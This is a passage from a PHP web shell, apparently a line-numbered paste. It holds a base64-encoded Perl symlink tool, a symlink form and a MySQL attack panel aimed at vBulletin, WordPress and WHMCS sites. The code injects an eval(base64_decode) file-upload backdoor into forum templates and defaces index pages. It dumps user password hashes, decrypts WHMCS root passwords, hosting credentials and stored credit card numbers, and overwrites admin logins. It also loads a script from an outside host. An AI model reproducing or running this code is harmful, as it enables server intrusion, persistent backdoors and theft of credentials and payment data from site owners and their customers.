QgbmFtZT0iU3VibWl0MSIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iR2V0IENvbmZpZyIgc3R5bGU9ImJvcmRlcjoxcHggZG90dGVkICMwMDMzMDA7IHdpZHRoOiA5OTsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6MTBwdDsgY29sb3I6I0ZGRkZGRjsgdGV4dC10cmFuc2Zvcm06dXBwZXJjYXNlOyBoZWlnaHQ6MjM7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQyIgLz48L3A+DQo8L2Zvcm0+PGJyIC8+PGJyIC8+UmlnaHRzIG9mIHRoaXMgcGVybCB0byBLYXJhciBhTFNoYU1pJzsNCn1lbHNlew0KQGxpbmVzID08JEZPUk17cGFzc30+Ow0KJHkgPSBAbGluZXM7DQpvcGVuIChNWUZJTEUsICI+dGFyLnRtcCIpOw0KcHJpbnQgTVlGSUxFICJ0YXIgLWN6ZiAiLiRGT1JNe3Rhcn0uIi50YXIgIjsNCmZvciAoJGthPTA7JGthPCR5OyRrYSsrKXsNCndoaWxlKEBsaW5lc1ska2FdICA9fiBtLyguKj8pOng6L2cpew0KJmxpbCgkMSk7DQpwcmludCBNWUZJTEUgJDEuIi50eHQgIjsNCmZvcigka2Q9MTska2Q8MTg7JGtkKyspew0KcHJpbnQgTVlGSUxFICQxLiRrZC4iLnR4dCAiOw0KfQ0KfQ0KIH0NCnByaW50Jzxib2R5IGNsYXNzPSJuZXdTdHlsZTEiIGJnY29sb3I9IiMwMDAwMDAiPg0KPHA+RG9uZSAhITwvcD4NCjxwPiZuYnNwOzwvcD4nOw0KaWYoJEZPUk17dGFyfSBuZSAiIil7DQpvcGVuKElORk8sICJ0YXIudG1wIik7DQpAbGluZXMgPTxJTkZPPiA7DQpjbG9zZShJTkZPKTsNCnN5c3RlbShAbGluZXMpOw0KcHJpbnQnPHA+PGEgaHJlZj0iJy4kRk9STXt0YXJ9LicudGFyIj48Zm9udCBjb2xvcj0iIzAwRkYwMCI+DQo8c3BhbiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lIj5DbGljayBIZXJlIFRvIERvd25sb2FkIFRhciBGaWxlPC9zcGFuPjwvZm9udD48L2E+PC9wPic7DQp9DQp9DQogcHJpbnQiDQo8L2JvZHk+DQo8L2h0bWw+Ijs=";
896.  
897. $write = fwrite ($f2 ,base64_decode($sml_perl));
898.  
899. if ($write)
900. {
901.  
902. @chmod('sa2/perl.pl',0755);
903.  
904.  
905. }
906.  
907. echo "<a href='sa2/perl.pl' target='_blank'>Symlink Perl</a>";
908. }
909.  
910.  
911. break;
912.  
913.  
914. }
915. /// home ///
916. }
917. }
918. else
919. {
920.  
921. echo '
922. The file path to symlink
923.  
924. <br /><br />
925. <form method="post">
926. <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
927. <input type="text" name="symfile" value="sa.txt" size="60"/><br /><br />
928. <input type="submit" value="symlink" name="symlink" /> <br /><br />
929.  
930.  
931.  
932. </form>
933. ';
934.  
935.  
936. $pfile = $_POST['file'];
937. $symfile = $_POST['symfile'];
938. $symlink = $_POST['symlink'];
939.  
940. if ($symlink)
941. {
942.  
943. @symlink("$pfile","sym/$symfile");
944.  
945. echo '<br /><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a>';
946. exit;
947. }else {exit;}
948.  
949.  
950.  
951.  
952. }
953.  
954.  
955.  
956. break;
957.  
958.  
959.  
960. //////////////////////// mysql ///////////////////////////////////////////////////////////////////////////////
961.  
962.  
963. case 'ms':
964.  
965.  
966.  
967.  
968. $host = $_POST['host'];
969. $user = $_POST['user'];
970. $pass = $_POST['pass'];
971. $db = $_POST['db'];
972.  
973.  
974.  
975.  
976.  
977.  
978. ////////////////// HEEEEEEEEEEEEERE /////////////////////////////////////////////// HEEEEEEEEEEEEERE /////////////////////////////
979.  
980. if ($_GET['show'] == 'tb'){
981.  
982. $host_c = $_COOKIE['host_mysql'];
983. $user_c = $_COOKIE['user_mysql'];
984. $pass_c = $_COOKIE['pass_mysql'];
985. $db_c = $_COOKIE['db_mysql'];
986.  
987.  
988. $con = @mysql_connect($host_c,$user_c,$pass_c);
989. $sel = @mysql_select_db($db_c);
990.  
991.  
992. if(!$sel){ echo "mysql connect error" ; exit;}
993.  
994. $dbname = $db_c;
995.  
996. $pTable = mysql_list_tables( $dbname ) ;
997.  
998. $num = mysql_num_rows( $pTable );
999.  
1000. echo "<div class='tmp'>
1001. <table align='center' width='40%'><td> Tables </td><td> Rows </td>";
1002.  
1003. for( $i = 0; $i < $num; $i++ ) {
1004.  
1005.  
1006. $tablename = mysql_tablename( $pTable, $i );
1007.  
1008. $sq3l=mysql_query("select * from $tablename");
1009.  
1010. $c3t=mysql_num_rows($sq3l);
1011.  
1012. echo "
1013.  
1014. <tr>
1015.  
1016. <td>
1017. <div class='dom'><a href='$pg?sws=ms&show=cl&tb=$tablename' />".$tablename." </a> </div>
1018. </td>
1019.  
1020.  
1021. <td>
1022. ".$c3t."
1023. </td>
1024.  
1025. </tr>
1026.  
1027. ";
1028.  
1029.  
1030.  
1031.  
1032. if ($tablename == 'template') { $secript = 'vb'; }
1033.  
1034. else if ($tablename == 'wp_post') {$secript = 'wp';}
1035.  
1036. else if ($tablename == 'jos_users') {$secript = 'jm';}
1037.  
1038. else if ($tablename == 'tbladmins') {$secript = 'wh';}
1039.  
1040.  
1041. }
1042.  
1043.  
1044. if ($secript == 'vb')
1045.  
1046. {
1047.  
1048.  
1049. echo '<div class="cont">
1050. <div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options vBulletin </b>
1051. <br /> <br /> <b>
1052. [ <a href="?sws=ms&op=in"> Update Index </a>]
1053.  
1054. [<a href="?sws=ms&op=sh"> Inject shell</a>]
1055.  
1056. [ <a href="?sws=ms&op=shm" >Show members Information</a>]
1057. ';
1058.  
1059.  
1060. }
1061.  
1062.  
1063.  
1064. else if ($secript == 'wp')
1065. {
1066.  
1067.  
1068. echo '
1069. <div class="cont">
1070. <div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options Wordpress </b><div>
1071. <br /> <br /> <b>
1072. [ <a href="?sws=ms&op=awp"> Change admin </a>]
1073.  
1074. [ <a href="?sws=ms&op=shwp" >Show members</a>]';
1075.  
1076.  
1077. }
1078.  
1079.  
1080. else if ($secript == 'wh'){
1081.  
1082. echo '
1083. <div class="cont">
1084. <div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options Whmcs </b><div>
1085. <br /> <br /> <b>
1086. [ <a href="?sws=ms&op=hroot">roots</a>]
1087. [ <a href="?sws=ms&op=chost"> Clients Hosting Account </a>]
1088. [ <a href="?sws=ms&op=scard" >Cards</a>] <br /><br />
1089. [ <a href="?sws=ms&op=trak" >tickets</a>]
1090. [ <a href="?sws=ms&op=rtrak" >ticket replies</a>]
1091. [ <a href="?sws=ms&op=sh3"> Search ticket</a>]
1092. [ <a href="?sws=ms&op=cadmin"> Change admin </a>]';
1093.  
1094.  
1095. }
1096. else{echo '<div class="cont"> ';}
1097.  
1098.  
1099. /////////////// cmd ////////////////////////////////
1100. echo "<br /><br />
1101.  
1102. [ <a href='?sws=ms&op=bkup'> baukup </a>]
1103. [ <a href='?sws=ms&op=css'> Inject css </a>]
1104. <br /><br />
1105. <form method='post'>
1106. <textarea rows=\"3\" name=\"sql\">Cmd sql</textarea> <br /><br />
1107. <input type=\"submit\" value=\"SQL\" name='cmd'/>
1108. </form>
1109. <br /><br />
1110. <a style=\" float: right\" href=\"?sws=ms&op=out\" >[ Logout ]</a>";
1111.  
1112. if (isset($_POST['cmd']))
1113. {
1114.  
1115. $sql = $_POST['sql'];
1116.  
1117. $query =@mysql_query($sql,$con) or die;
1118.  
1119. if ($query){echo "<br /><br /><center><br /><div style=\"color: #003300; font-weight: bold\">CMD sql successfully </div> </center>";} elseif(!$query) {echo "<br /><br /><center><br /><div style=\"color: red; font-weight: bold\">CMD sql error </div> </center>";}
1120.  
1121.  
1122. }
1123.  
1124. exit;
1125.  
1126.  
1127. }
1128.  
1129. ///////////////////// show cl ///////////////
1130. else if ($_GET['show'] == 'cl')
1131.  
1132. {
1133.  
1134.  
1135.  
1136.  
1137.  
1138. $host_c = $_COOKIE['host_mysql'];
1139. $user_c = $_COOKIE['user_mysql'];
1140. $pass_c = $_COOKIE['pass_mysql'];
1141. $db_c = $_COOKIE['db_mysql'];
1142.  
1143.  
1144. $con = @mysql_connect($host_c,$user_c,$pass_c);
1145. $sel = @mysql_select_db($db_c);
1146.  
1147. $tb = $_GET['tb'];
1148.  
1149. $col_sws = mysql_query("SHOW COLUMNS FROM $tb");
1150.  
1151. $num2 = mysql_num_rows( $col_sws );
1152. echo "<div class='tmp'> <table align='center'><td>Columns Name</td><td>Content</td>";
1153. for( $i2 = 0; $i2 < $num2; $i2++ ){
1154.  
1155. $col = mysql_fetch_row($col_sws) ;
1156. $um_sws = $col[0];
1157.  
1158. echo "<tr><td>$um_sws&nbsp;</td>" ;
1159.  
1160.  
1161. $tit = mysql_query ("SELECT * FROM $tb" );
1162. while ($row = mysql_fetch_assoc($tit))
1163. {
1164.  
1165. $cont = $row[$um_sws] ;
1166.  
1167. echo "<td>$cont</td></tr>" ;
1168.  
1169.  
1170. }
1171.  
1172. ;
1173.  
1174.  
1175. }
1176.  
1177.  
1178.  
1179.  
1180. exit;
1181.  
1182.  
1183. }
1184.  
1185.  
1186.  
1187.  
1188.  
1189.  
1190.  
1191.  
1192.  
1193. if (isset($_COOKIE['host_mysql'])){
1194.  
1195. if (!isset($_GET['op'])){
1196.  
1197. echo " <meta http-equiv=\"refresh\" content=\"0; url=$pg?sws=ms&show=tb\" /> ";
1198.  
1199.  
1200. exit;
1201. }
1202.  
1203.  
1204. }
1205.  
1206.  
1207.  
1208.  
1209.  
1210. else if (!isset($_COOKIE['host_mysql']))
1211.  
1212. {
1213.  
1214.  
1215. if (!isset($host))
1216. {
1217.  
1218.  
1219. echo '
1220.  
1221. <div >
1222.  
1223. <br /><br /><br />
1224. <pre><form method="POST">
1225. host :<input type="text" name="host" /><br />
1226. user :<input type="text" name="user" /><br />
1227. pass :<input type="text" name="pass" /><br />
1228. db :<input type="text" name="db" /><br />
1229. <input type="submit" name="login" value="login .." />
1230. </form></pre>';
1231. exit;}
1232. else
1233. {
1234.  
1235. $host = $_POST['host'];
1236. $user = $_POST['user'];
1237. $pass = $_POST['pass'];
1238. $db = $_POST['db'];
1239.  
1240.  
1241. $con = @mysql_connect($host,$user,$pass) ;
1242.  
1243. $sel = @mysql_select_db($db,$con);
1244.  
1245. if (!$sel)
1246. {
1247.  
1248. echo " MYSQL INFOTMATI NOT TREY ";
1249.  
1250.  
1251. }
1252.  
1253. else
1254. {
1255.  
1256.  
1257.  
1258. setcookie( "host_mysql", $host);
1259. setcookie( "user_mysql", $user);
1260. setcookie( "pass_mysql", $pass);
1261. setcookie( "db_mysql", $db);
1262. ob_end_flush();
1263.  
1264. echo " <meta http-equiv=\"refresh\" content=\"0; url=$pg?sws=ms&show=tb\" /> ";
1265. exit;
1266.  
1267.  
1268.  
1269.  
1270.  
1271. }}}
1272.  
1273.  
1274.  
1275.  
1276. /////////////////////////////////// Options /////////////////////////////////////////
1277.  
1278. if (isset($_GET['op']))
1279. {
1280.  
1281. $op = $_GET['op'];
1282.  
1283. $host_c = $_COOKIE['host_mysql'];
1284. $user_c = $_COOKIE['user_mysql'];
1285. $pass_c = $_COOKIE['pass_mysql'];
1286. $db_c = $_COOKIE['db_mysql'];
1287.  
1288. $con3 =@mysql_connect($host_c,$user_c,$pass_c) or die ;
1289. $sedb3 =@mysql_select_db($db_c,$con3) or die;
1290. if (!$sedb3){echo "error in mysql connect "; exit;}
1291.  
1292.  
1293. /////// index vb ////////
1294.  
1295. if ($op == 'in')
1296. {
1297.  
1298. if (!isset($index)){
1299.  
1300. echo '
1301. Your index : <br /><br />
1302. <form method="post">
1303.  
1304. <textarea rows="7" name="index" cols="40"></textarea>
1305.  
1306. <br /><br />
1307. <input type="submit" value="Update Index" maxlength="30" name="sql" />
1308. </form> ';
1309. }
1310. else if ($_POST['sql'])
1311. {
1312.  
1313.  
1314. $index =$_POST['index'];
1315.  
1316. $index=str_replace("\'","'",$index);
1317. $crypt = "{\${eval(base64_decode(\'";
1318. $crypt .= base64_encode("echo \"$index\";");
1319. $crypt .= "\'))}}{\${exit()}}</textarea>";
1320. $sqlindex = "UPDATE `template` SET `template` = '$crypt'" or die;
1321. $query =@ mysql_query($sqlindex);
1322.  
1323. if ($query)
1324. {
1325. echo "<center><br /><div style=\"color: #003300; font-weight: bold\">Updated Index successfully </div> </center>";
1326. echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1327. exit;
1328. }
1329. else if (!$query)
1330. {
1331. echo "<center><br /><div style=\"color: #003300; font-weight: bold\">Updated Index erorr </div> </center>";
1332. echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1333. exit;
1334.  
1335. }
1336.  
1337.  
1338.  
1339.  
1340. }
1341.  
1342.  
1343.  
1344.  
1345.  
1346.  
1347.  
1348.  
1349.  
1350.  
1351. }
1352. /////// shelllll ///////////
1353. else if($op == 'sh')
1354.  
1355. {
1356.  
1357.  
1358.  
1359. if (!isset($_POST['ch']))
1360. {
1361.  
1362.  
1363. echo '
1364. <br /><br /><br />
1365. <form method="post">
1366. <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
1367. <select name="ch">
1368. <option value="faq">Inject shell in faq </option>
1369. <option value="cal">Inject shell in calendar </option>
1370. <option value="sea">Inject shell in search </option>
1371. </select>
1372. <br /><br /><br />
1373. <input type="submit" name="sql" value="Inject shell" />
1374. </form>
1375.  
1376.  
1377.  
1378. ';
1379.  
1380. } if (isset($_POST['sql'])){
1381.  
1382. $ch = $_POST['ch'];
1383. $shell = "DQoNCmVjaG8gJzxiPlsgYWwtc3dpc3JlIF0mbmJzcDsmbmJzcDtbIFNhdWRpIHNoZWxsIF08YnI+PGJyPjxicj48L2I+JzsgZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsgZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7IGlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+VXBsb2FkIFN1Y2Nlc3MgISEhPC9iPjxicj48YnI+JzsgfSBlbHNlIHsgZWNobyAnPGI+VXBsb2FkIEZhaWwgISEhPC9iPjxicj48YnI+JzsgfSB9IA0KPz4=" ;
1384. $crypt = "{\${eval(base64_decode(\'";
1385. $crypt .= "$shell";
1386. $crypt .= "\'))}}{\${exit()}}</textarea>";
1387.  
1388.  
1389.  
1390.  
1391. if ($ch == 'faq'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'";}
1392.  
1393. elseif ($ch == 'cal'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='CALENDAR'";}
1394.  
1395. elseif ($ch == 'sea'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='search_forums'";}
1396.  
1397.  
1398. $query =@ mysql_query($sqlfaq);
1399.  
1400. if ($query)
1401. {
1402. echo "<br /><br /><center><br /><div style=\"color: #003300; font-weight: bold\">Injection has been successfully</div> </center>";
1403. echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1404. exit;
1405. }
1406. else if (!$query)
1407. {
1408. echo "<br /><br /><center><br /><div style=\"color: #003300; font-weight: bold\">Injection has been erorr !</div> </center>";
1409. echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1410. exit;
1411.  
1412. }
1413.  
1414.  
1415. }
1416.  
1417.  
1418.  
1419.  
1420.  
1421.  
1422.  
1423.  
1424.  
1425. }
1426. else if ($op == 'shm')
1427. {
1428.  
1429.  
1430.  
1431.  
1432.  
1433. $sql = 'select * from `user`';
1434. $query =@ mysql_query($sql);
1435.  
1436. if ($query)
1437. {
1438.  
1439. while ($row = mysql_fetch_assoc($query))
1440. {
1441.  
1442. echo "
1443. <br /><br /><table cellpadding='4' cellspacing='4' align='center' class='tbm'>
1444. <tr>
1445. <td>ID :</td>
1446. <td>user :</td>
1447. <td>pass :</td>
1448. <td>salt :</td>
1449. <td>email :</td>
1450.  
1451. </tr>
1452.  
1453. <tr>
1454. <td>".$row['userid']."</td>
1455. <td>".$row['username']."</td>
1456. <td>".$row['password']."</td>
1457. <td>".$row['salt']."</td>
1458. <td>".$row['email']."</td>
1459. </tr>
1460.  
1461. </table>
1462.  
1463. ";
1464.  
1465.  
1466.  
1467.  
1468.  
1469. }}
1470.  
1471. }
1472. else if ($op == 'out')
1473. {
1474.  
1475. setcookie( "host_mysql", $host,time()-3600);
1476. setcookie( "user_mysql", $user,time()-3600);
1477. setcookie( "pass_mysql", $pass,time()-3600);
1478. setcookie( "db_mysql", $db,time()-3600);
1479. ob_end_flush();
1480.  
1481.  
1482. echo " <meta http-equiv=\"refresh\" content=\"0; url=$pg?sws=ms\" /> ";
1483. exit;
1484.  
1485.  
1486.  
1487. }
1488.  
1489. ///////////////////////////////// whmcs ////////////////////////////////////////
1490.  
1491.  
1492. else if ($op == 'hroot')
1493. {
1494.  
1495.  
1496.  
1497.  
1498.  
1499.  
1500. if (isset($_POST['viw']))
1501. {
1502.  
1503. $hash = $_POST['hash'] ;
1504.  
1505.  
1506. $query = mysql_query("SELECT * FROM tblservers");
1507.  
1508. echo "<div class='tmp'><table cellpadding='5' align='center'>
1509. hosting roots
1510. <tr><td>Type</td><td>noc</td><td>Active</td><td>IP Address</td><td>username</td><td>Password</td></tr>";
1511.  
1512. while($row = mysql_fetch_array($query)) {
1513.  
1514. echo "<tr>
1515. <td>{$row['type']}</td><td>{$row['noc']}</td><td>{$row['active']}</td><td>{$row['ipaddress']}</td><td>{$row['username']}</td><td>".decrypt($row['password'], $hash)."</td>
1516.  
1517. </tr>";
1518. }
1519. echo "</table>";
1520.  
1521.  
1522. $query = mysql_query("SELECT * FROM tblhosting where username = 'root' or 'admin' or 'administrator'");
1523. echo "<table cellpadding='5' align='center'>
1524. <br /><br />
1525. Clients roots
1526. <tr><td>IP Address</td><td>username</td><td>Password</td></tr>";
1527.  
1528. while($row = mysql_fetch_array($query)) {
1529.  
1530. echo "<tr>
1531. <td>{$row['dedicatedip']}</td><td>{$row['username']}</td><td>".decrypt($row['password'], $hash)."</td>
1532.  
1533. </tr>";
1534. }
1535. echo "</table></div>";
1536. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1537. exit;
1538.  
1539.  
1540. }
1541. else
1542. {
1543.  
1544. echo'<form method="post">
1545. <br /><br />
1546. encryption hash <br /><br /><input type="text" name="hash" /><br /><br />
1547. <input type="submit" name="viw" value="show" />
1548.  
1549. </form>';
1550. exit;
1551.  
1552.  
1553.  
1554.  
1555.  
1556. }
1557.  
1558.  
1559. }
1560.  
1561.  
1562. //////////// domine ////////////
1563.  
1564. else if ($op == 'scard')
1565.  
1566. {
1567.  
1568. if (isset($_POST['viw']))
1569. {
1570.  
1571. $hash = $_POST['hash'] ;
1572.  
1573.  
1574. $query = mysql_query('select * from `tblclients`') ;
1575. echo "<div class='tmp'><table cellpadding='5' align='center'> ";
1576. while($v = mysql_fetch_array($query)) {
1577. echo "
1578. <tr><td>cardtype</td>
1579. <td>id</td>
1580. <td>firstname</td>
1581. <td>lastname</td>
1582. <td>email</td>
1583. <td>city</td>
1584. <td>ciuntry</td>
1585. <td>address1</td>
1586. <td>lastlogin</td>
1587. <td>phonenumber</td>
1588. <td>datecreated</td>
1589. <td>cardnum</td>
1590. <td>startdate</td>
1591. <td>expdate</td>
1592. </tr>";
1593. echo "<tr>
1594.  
1595. <td>{$v['cardtype']}</td>
1596. <td>{$v['id']}</td>
1597. <td>{$v['firstname']}</td>
1598. <td>{$v['lastname']}</td>
1599. <td>{$v['email']}</td>
1600. <td>{$v['city']}</td>
1601. <td>{$v['ciuntry']}</td>
1602. <td>{$v['address1']}</td>
1603. <td>{$v['lastlogin']}</td>
1604. <td>{$v['phonenumber']}</td>
1605. <td>{$v['datecreated']}</td>
1606. <td>".decrypt ($v['cardnum'], $hash)."</td>
1607. <td>".decrypt ($v['startdate'], $hash)."</td>
1608. <td>".decrypt ($v['expdate'], $hash)."</td>
1609. </tr></div></table>";
1610. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1611. exit;
1612.  
1613. }
1614. }else
1615. {
1616.  
1617. echo'<form method="post">
1618. <br /><br />
1619. encryption hash <br /><br /><input type="text" name="hash" /><br /><br />
1620. <input type="submit" name="viw" value="show" />
1621.  
1622. </form>';
1623. exit;
1624.  
1625.  
1626.  
1627.  
1628.  
1629. }
1630.  
1631.  
1632.  
1633.  
1634.  
1635.  
1636.  
1637. }
1638.  
1639. else if ($op == 'chost')
1640.  
1641. {
1642.  
1643.  
1644.  
1645. if (isset($_POST['viw']))
1646. {
1647.  
1648. $hash = $_POST['hash'] ;
1649.  
1650. $query = mysql_query("SELECT * FROM tblhosting");
1651. echo "<div class='tmp'><table cellpadding='5' align='center'>
1652. <tr><td>domain</td><td>Username</td><td>Pass</td><td>IP Address</td></tr>";
1653. while($r = mysql_fetch_array($query)) {
1654. echo "<tr><td>{$r['domain']}</td><td>{$r['username']}</td>
1655. <td>".decrypt ($r['password'], $hash)."</td><td>{$r['dedicatedip']}</td></tr>";
1656. }
1657. echo "</table></div>";
1658. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1659.  
1660. exit;
1661.  
1662.  
1663.  
1664. }
1665. else
1666. {
1667.  
1668. echo'<form method="post">
1669. <br /><br />
1670. encryption hash <br /><br /><input type="text" name="hash" /><br /><br />
1671. <input type="submit" name="viw" value="show" />
1672.  
1673. </form>';
1674. exit;
1675.  
1676.  
1677.  
1678.  
1679.  
1680. }
1681.  
1682.  
1683.  
1684.  
1685.  
1686.  
1687.  
1688. }
1689.  
1690.  
1691.  
1692. else if ($op == 'cadmin')
1693.  
1694. {
1695.  
1696.  
1697.  
1698. if (isset($_POST['viw']))
1699. {
1700.  
1701. $pass = md5($_POST['pass']);
1702. $user = $_POST['user'];
1703.  
1704.  
1705.  
1706. $query =@mysql_query("UPDATE `tbladmins` SET `username` ='".$user."' WHERE ID = 1");
1707. $query =@mysql_query("UPDATE `tbladmins` SET `password` ='".$pass."' WHERE ID = 1");
1708.  
1709. if ($query)
1710. {
1711. echo "<center><br /><div style=\"color: #003300; font-weight: bold\">Updated admin successfully </div> </center>";
1712. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1713.  
1714. exit;
1715. }
1716.  
1717. else if (!$query)
1718. {
1719. echo "<center><br /><div style=\"color: red; font-weight: bold\">Updated admin erorr </div> </center>";
1720. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1721.  
1722. exit;
1723.  
1724. }
1725.  
1726.  
1727.  
1728.  
1729.  
1730.  
1731.  
1732. }
1733. else
1734. {
1735.  
1736. echo'<form method="post">
1737. <br /><br />
1738. user : <input type="text" name="user" /><br /><br />
1739. pass : <input type="text" name="pass" /><br /><br />
1740. <input type="submit" name="viw" value="update" />
1741.  
1742. </form>';
1743.  
1744.  
1745. exit;
1746.  
1747.  
1748.  
1749.  
1750.  
1751. }
1752. }
1753.  
1754.  
1755.  
1756. else if ($op == 'trak')
1757.  
1758. {
1759.  
1760. $page = $_GET['page'];
1761. $numpr = 30;
1762. if(!$page){$page = 0;}
1763. $sql0 = mysql_query("Select * from tbltickets");
1764. $num_r0s = mysql_num_rows($sql0);
1765.  
1766.  
1767. $sql = mysql_query("Select * from tbltickets order by id desc limit $page,$numpr");
1768.  
1769. $ap = 1;
1770. echo "<br /><br /><div>Page : ";
1771. for ($s = 0 ; $s < $num_r0s; $s = $s+$numpr )
1772. {
1773.  
1774. if ($page != $s) { echo "<a class='hr' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
1775. else {echo "<a class='hr2' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
1776.  
1777.  
1778. $ap ++;
1779.  
1780. }
1781.  
1782. echo "</div><br />";
1783.  
1784.  
1785. while ($r3o = mysql_fetch_assoc($sql))
1786. {
1787.  
1788. $email = $r3o['email'];
1789. $date = $r3o['date'];
1790. $title = $r3o['title'];
1791. $message = $r3o['message'];
1792. echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
1793.  
1794. echo "<tr><td>email : $email </td><td>date : $date </td><td>title : $title</td></tr>
1795. <tr > <td>message</td> <td colspan='3'>$message</td><br /><br /></tr>";
1796. echo "</table></div>";
1797. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1798. exit;
1799.  
1800.  
1801.  
1802. }
1803.  
1804. }
1805.  
1806.  
1807. else if ($op == 'rtrak')
1808.  
1809. {
1810.  
1811. $page = $_GET['page'];
1812. $numpr = 25;
1813. if(!$page){$page = 0;}
1814. $sql0 = mysql_query("Select * from tblticketreplies");
1815. $num_r0s = mysql_num_rows($sql0);
1816.  
1817.  
1818. $sql = mysql_query("Select * from tblticketreplies order by id desc limit $page,$numpr");
1819.  
1820. $ap = 1;
1821. echo "<br /><br /><div>Page : ";
1822. for ($s = 0 ; $s < $num_r0s; $s = $s+$numpr )
1823. {
1824.  
1825. if ($page != $s) { echo "<a class='hr' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
1826. else {echo "<a class='hr2' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
1827.  
1828.  
1829. $ap ++;
1830.  
1831. }
1832.  
1833. echo "</div><br />";
1834.  
1835.  
1836. while ($r3o = mysql_fetch_assoc($sql))
1837. {
1838.  
1839. $email = $r3o['email'];
1840. $date = $r3o['date'];
1841. $message = $r3o['message'];
1842. echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
1843.  
1844. echo "<tr><td>email : $email </td><td>date : $date </td></tr>
1845. <tr > <td>message</td> <td colspan='2'>$message</td><br /><br /></tr>";
1846. echo "</table></div>";
1847. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1848. exit;
1849.  
1850.  
1851.  
1852. }
1853.  
1854. }
1855.  
1856.  
1857. /////////////////////////////////// backup //////////////////////////
1858.  
1859. else if ($op == 'bkup')
1860. {
1861.  
1862.  
1863.  
1864.  
1865.  
1866.  
1867. if (isset($_POST['viw']))
1868. {
1869.  
1870.  
1871.  
1872. $path = $_POST['path'];
1873.  
1874. $domp = @backup_tables($path,$host_c,$user_c,$pass_c,$db_c);
1875.  
1876.  
1877. echo "<center><br /><div style=\"color: #003300; font-weight: bold\">Create backup successfully <br /><br /> $path</div> </center>";
1878. echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
1879. exit;
1880.  
1881.  
1882.  
1883.  
1884.  
1885.  
1886. }
1887. else
1888. {
1889.  
1890. echo'<form method="post">
1891. <br /><br />
1892. path backup <br /><br /><input type="text" name="path" /><br /><br />
1893. <input type="submit" name="viw" value="Create" />
1894.  
1895. </form>';
1896. exit;
1897.  
1898.  
1899.  
1900.  
1901.  
1902. }
1903.  
1904.  
1905. }
1906.  
1907.  
1908.  
1909.  
1910.  
1911. else if ($op == 'sh3')
1912.  
1913. {
1914.  
1915. if (isset($_POST['viw']))
1916. {
1917.  
1918. $string = $_POST['string'];
1919. $ch = $_POST['ch'];
1920.  
1921. if ($ch == 'trs')
1922. {
1923. $sql4 = @mysql_query("Select * from tblticketreplies WHERE `message` LIKE '%$string%'");
1924.  
1925. }
1926.  
1927. else if($ch == 'tr')
1928. {
1929. $sql4 = @mysql_query("Select * from tbltickets WHERE `message` LIKE '%$string%' ");
1930. }
1931.  
1932.  
1933.  
1934.  
1935. $nu0 = @mysql_num_rows($sql4);
1936. if ($nu0 == 0){echo "No result"; exit;}
1937.  
1938. while ($r33o = mysql_fetch_assoc($sql4))
1939. {
1940.  
1941.  
1942. $date = $r33o['date'];
1943. $title = $r33o['title'];
1944. $message = $r33o['message'];
1945. echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
1946.  
1947. echo "<tr><td>email : $email </td><td>date : $date </td><td>title : $title</td></tr>
1948. <tr > <td>message</td> <td colspan='3'>$message</td><br /><br /></tr>";
1949. echo "</table></div>";
1950. exit;
1951.  
1952.  
1953.  
1954. }
1955.  
1956.  
1957.  
1958.  
1959.  
1960. }
1961. else
1962. {
1963.  
1964. echo'<form method="post">
1965. <br /><br />
1966. search : <input type="text" name="string" />&nbsp;&nbsp;<select name="ch">
1967. <option value="tr">ticket</option>
1968. <option value="trs">ticket replies</option>
1969. </select> <br /><br />
1970. <input type="submit" name="viw" value="search" />
1971.  
1972. </form>';
1973. exit;
1974.  
1975.  
1976.  
1977.  
1978.  
1979. }
1980. }
1981.  
1982.  
1983.  
1984.  
1985. else if ($op == 'sh3')
1986.  
1987. {
1988.  
1989. if (isset($_POST['viw']))
1990. {
1991.  
1992. $string = $_POST['string'];
1993. $ch = $_POST['ch'];
1994.  
1995. if ($ch == 'trs')
1996. {
